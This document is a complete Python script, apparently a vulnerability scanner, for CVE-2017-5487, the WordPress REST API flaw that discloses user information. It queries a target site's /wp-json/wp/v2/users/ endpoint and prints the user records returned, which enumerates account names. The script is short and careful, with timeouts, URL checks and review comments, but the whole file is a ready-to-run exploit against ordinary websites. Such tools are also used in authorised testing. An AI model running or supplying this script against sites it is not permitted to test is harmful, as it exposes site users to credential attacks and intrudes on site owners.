krpexploit.py
#!/usr/bin/python
#===============================================================
# WordPress Website User Information Disclosure using REST API
# CVE-2017-5487 Vulnerability Scanner
# Author: Kailas PATIL
# Email: patilkr80 [AT] gmail [DOT] com
#===============================================================
import sys, getopt
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
import json
import datetime
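def main(argv):
    """Check one WordPress site for the unauthenticated REST user listing.

    Sends a single GET request to ``<url>/wp-json/wp/v2/users/`` (the
    endpoint associated with CVE-2017-5487) and pretty-prints whatever JSON
    the server returns.

    Args:
        argv: Command-line arguments without the program name. ``-h`` prints
            the help text; ``-u <URL>`` / ``--url <URL>`` names the site.

    Exits with status 1 when no URL is supplied, and with status 2 on an
    unknown option or a URL that is not http(s).
    """
    if not argv:
        print ('The required option is: --url or -u')
        print ('Please use -h for the list of available options.')
        sys.exit(1)

    websiteurl = ''
    apistring = '/wp-json/wp/v2/users/'
    # Without a timeout an unresponsive server would block the scan forever.
    timeout_seconds = 15

    try:
        opts, args = getopt.getopt(argv, "hu:", ["url="])
    except getopt.GetoptError:
        # The original called an undefined Usage() here, which raised
        # NameError instead of reporting the bad option.
        print ('krpexploit.py -u <URL>')
        print ('Please use -h for the list of available options.')
        print ('_____________________________________________________')
        sys.exit(2)

    for opt, arg in opts:
        if opt == '-h':
            print ('_______________________________________________________________')
            print ('WordPress Website User Information Disclosure using REST API')
            print (' CVE-2017-5487 Vulnerability Scanner')
            print ('_______________________________________________________________')
            print (' Author: Kailas PATIL')
            print (' Email: patilkr80 [AT] gmail [DOT] com')
            print ('_______________________________________________________________')
            print (' Usage: python3 krpexploit.py [options]')
            print (' -h Display the simple help and exit')
            print (' --url <URL> The URL of the WordPress website to scan ')
            print (' -u <URL> The URL of the WordPress website to scan ')
            print ('_______________________________________________________________')
            print (' Example:')
            print (' python3 krpexploit.py --url http://example.com')
            print ('_______________________________________________________________')
            sys.exit()
        elif opt in ("-u", "--url"):
            websiteurl = arg

    if not websiteurl:
        # Only positional arguments were given; there is nothing to scan.
        print ('The required option is: --url or -u')
        print ('Please use -h for the list of available options.')
        sys.exit(1)

    # urlopen() also accepts file: and ftp: URLs; this tool is meant for web
    # sites only, so anything other than http(s) is rejected up front.
    if not websiteurl.lower().startswith(('http://', 'https://')):
        print (' Error!!! The URL must start with http:// or https://')
        sys.exit(2)

    print ('===============================================================')
    print ('WordPress Website User Information Disclosure using REST API')
    print (' CVE-2017-5487 Vulnerability Scanner')
    print (' Author: Kailas PATIL')
    print (' Email: patilkr80 [AT] gmail [DOT] com')
    print ('_______________________________________________________________')
    print (' WebsiteURL Provided by the User to Scan: ', websiteurl)
    # Drop a trailing slash so the request path does not start with "//".
    payload = websiteurl.rstrip('/') + apistring
    print (' Payload URL is: ', payload)
    now = datetime.datetime.now()
    print (" Scan date and time : " + now.strftime("%Y-%m-%d %H:%M:%S"))
    print ('===============================================================')

    req = Request(payload)
    try:
        # The context manager closes the connection even if read() fails.
        with urlopen(req, timeout=timeout_seconds) as response:
            the_page = response.read()
    except HTTPError as e:
        print(' HTTP Error Code is: ', e.code)
        print(' Error !!! HTTP Error. Unsucessful to exploit the given web URL.')
    except URLError as e:
        print (' Error!!! URL Error. Unsuccessful to exploit the given website.')
        print('URLError: {}'.format(e.reason))
    except OSError as e:
        # Covers a timeout or connection reset while the body is being read.
        print (' Error!!! Network error while reading the response: {}'.format(e))
    else:
        try:
            data = json.loads(the_page)
            # json.dumps() escapes control characters, so server-supplied
            # strings cannot inject terminal escape sequences when printed.
            # NOTE(review): any valid JSON is printed as-is; a JSON error
            # object is not evidence of disclosure. Confirm that the body
            # is a list of user records before reporting a finding.
            print (json.dumps(data, indent=2, sort_keys=True))
        except ValueError as e:
            print(' JSON Error: {}'.format(e))
            print (' Unsuccessful to exploit the given website.')
    print ('_____________________________________________________')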
# Script entry point: pass the command-line arguments, minus the program
# name, to main() when the file is run directly rather than imported.
if __name__ == "__main__":
    cli_args = sys.argv[1:]
    main(cli_args)